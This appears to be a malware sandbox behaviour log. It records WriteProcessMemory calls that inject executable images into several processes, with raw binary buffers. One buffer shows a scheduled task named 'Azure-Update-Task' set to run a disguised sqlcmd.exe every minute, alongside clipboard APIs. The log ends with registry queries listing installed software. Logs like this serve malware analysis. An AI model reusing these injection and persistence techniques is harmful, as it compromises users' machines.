buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $8±K¿|Ð%ì|Ð%ì|Ð%ìì}Ð%즻ìdÐ%즏ìùÐ%즎ìOÐ%ìu¨¦ì~Ð%ìu¨¶ì{Ð%ì|Ð$ìÐ%즊ìvÐ%즸ì}Ð%ìRich|Ð%ìPELŒÎ^à  0â‹z@@@D¨Pôhš@@.text“.0 `.rdatalq@r4@@.data¨CÀ¦@À.reloc0+,¸@B
base_address: 0x00400000
process_identifier: 2408
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2408
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $J%[B+KB+KB+Kö·ºP+Kö·¸Ü+Kö·¹\+KR@+KVC+K܋ŒC+KyuH [+KyuN x+KyuO `+KKSØQ+KB+J¾+KÕuB +KÐu´C+KÕuI C+KRichB+KPELb•l`à ~î쎐@Ð@€ÀÚÜP0I ˜/`Â8ô˜Â@Ô.textù|~ `.rdataÖ_`‚@@.data9ðâ@À.tls 0ð@À.gfids0@ò@@.rsrc0IPJö@@.reloc˜/ 0@@B
base_address: 0x00400000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

buffer: ÿÿÿÿ€±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ “    ÜÓDàÖDÚÓD..€ñE<F<F<F<F<F<F<F<F<F„ñE@F@F@F@F@F@F@FˆñEÿÿÿÿ€ ÿÿÿÿàÖDØòEØòEØòEØòEØòEˆñE`ÙDàÚDðîDòEàöEC¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZàöEþÿÿÿPSTPDTùEPùEþÿÿÿu˜Ï!­tåša¾Œe¸‘¢z»Œ^ž âȨ3œd•D.?AVtype_info@@d•D.?AVbad_alloc@std@@d•D.?AVbad_array_new_length@std@@d•D.?AVlogic_error@std@@d•D.?AVlength_error@std@@d•D.?AVout_of_range@std@@d•D.?AV_Facet_base@std@@d•D.?AV_Locimp@locale@std@@d•D.?AVfacet@locale@std@@d•D.?AU_Crt_new_delete@std@@d•D.?AVcodecvt_base@std@@d•D.?AUctype_base@std@@d•D.?AV?$ctype@D@std@@d•D.?AV?$codecvt@DDU_Mbstatet@@@std@@d•D.?AVbad_exception@std@@d•D.Hd•D.?AVfailure@ios_base@std@@d•D.?AVruntime_error@std@@d•D.?AVsystem_error@std@@d•D.?AVbad_cast@std@@d•D.?AV_System_error@std@@d•D.?AVexception@std@@
base_address: 0x0045f000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x00463000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

buffer: ÍK²K”.'PAP”.P”.ÉÊ”.zÍq‡‡–ŽjކPÎÕ½Õ›fCf”.”.›„îƒIPPNê•äpàRk\¤\¤×ì¯íÜ{LŒAÁiVüñæô3ûƒýù„ZlQg.œf b ErNPNWN]TUZ[4 äøää äö_^îØØäüûüû í9<8;ú` Ÿž†…¢†…§µ¶³´±²¯°†…¸ Ÿ†… Y
base_address: 0x00464000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer:  €8€P€h€€ €Dè‚êD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo€000004b0,FileDescription 0FileVersion0.0.0.08 InternalNameuactest.exe(LegalCopyright @ OriginalFilenameuactest.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00408000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: ` p1
base_address: 0x0040a000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: 0 ð;
base_address: 0x00406000
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

buffer: Ø*è*ú*++,+>.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@ˆ%@È!@€!@ø#@P @à @˜ @%@ "@8!@B”` ´¸)¸B”`GCTL­.text$mn 0.idata$50 ˆ .rdata¸)´.rdata$zzzdbgl*(.idata$2”*.idata$3¨*0.idata$4Ø*¶.idata$60`.bss¨*`+ Ð*‚+( Ø*è*ú*++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObject†CloseHandle^ExitProcessåCreateProcessW­CopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll
base_address: 0x00402000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 1164
process_handle: 0x0000052c
0 0

WriteProcessMemory

buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~0‹0‘0˜0ž0¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z1‚1‰1Ž1•1š1¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k22Ÿ2¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v3†3“3ª3Í3Ó3â3ñ3ú3 4¤4¶4Ç4Ô4à4í45515N5\5i5v5‚55¨5´5ß5ì5ù56!6L6Y6f66‘6Ÿ6¬6¹6È6Õ6î6777+777D7]7i7š7§7´7Í7æ7ÿ7818J8c8|8•8¡8Ô8í8ù8949U9`9g9q9y9ƒ9Œ9’9™9®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y=’=¢=>>>(>=>œ>©>¶>Ã>å>v?ƒ??? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9
base_address: 0x00404000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 1164
process_handle: 0x0000052c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌNäˆ/ŠOˆ/ŠOˆ/ŠOÓG‰N™/ŠOÓGN4/ŠOÓGN‰/ŠO]BŽN›/ŠO]B‰N/ŠO]BNÚ/ŠOÓGŽN‘/ŠOÓGŒN‰/ŠOÓG‹N“/ŠOˆ/‹Ox/ŠOAƒN‡/ŠOAˆN‰/ŠORichˆ/ŠOPELIJW`à Žt[Ü @ @ÐBÀL[Ø8HØ@ ¤.text}ŒŽ `.rdataP¸ º’@@.data\`LL@À.relocL[À\˜@B
base_address: 0x00400000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ ˜$„¦°@@Оà\CODE°–˜ `DATAl°œ@ÀBSSÅÀ¤À.idatažÐ¤@À.reloc\à¬@PÄ@P
base_address: 0x00400000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $8±K¿|Ð%ì|Ð%ì|Ð%ìì}Ð%즻ìdÐ%즏ìùÐ%즎ìOÐ%ìu¨¦ì~Ð%ìu¨¶ì{Ð%ì|Ð$ìÐ%즊ìvÐ%즸ì}Ð%ìRich|Ð%ìPELŒÎ^à  0â‹z@@@D¨Pôhš@@.text“.0 `.rdatalq@r4@@.data¨CÀ¦@À.reloc0+,¸@B
base_address: 0x00400000
process_identifier: 2408
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $J%[B+KB+KB+Kö·ºP+Kö·¸Ü+Kö·¹\+KR@+KVC+K܋ŒC+KyuH [+KyuN x+KyuO `+KKSØQ+KB+J¾+KÕuB +KÐu´C+KÕuI C+KRichB+KPELb•l`à ~î쎐@Ð@€ÀÚÜP0I ˜/`Â8ô˜Â@Ô.textù|~ `.rdataÖ_`‚@@.data9ðâ@À.tls 0ð@À.gfids0@ò@@.rsrc0IPJö@@.reloc˜/ 0@@B
base_address: 0x00400000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 1164
process_handle: 0x0000052c
0 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

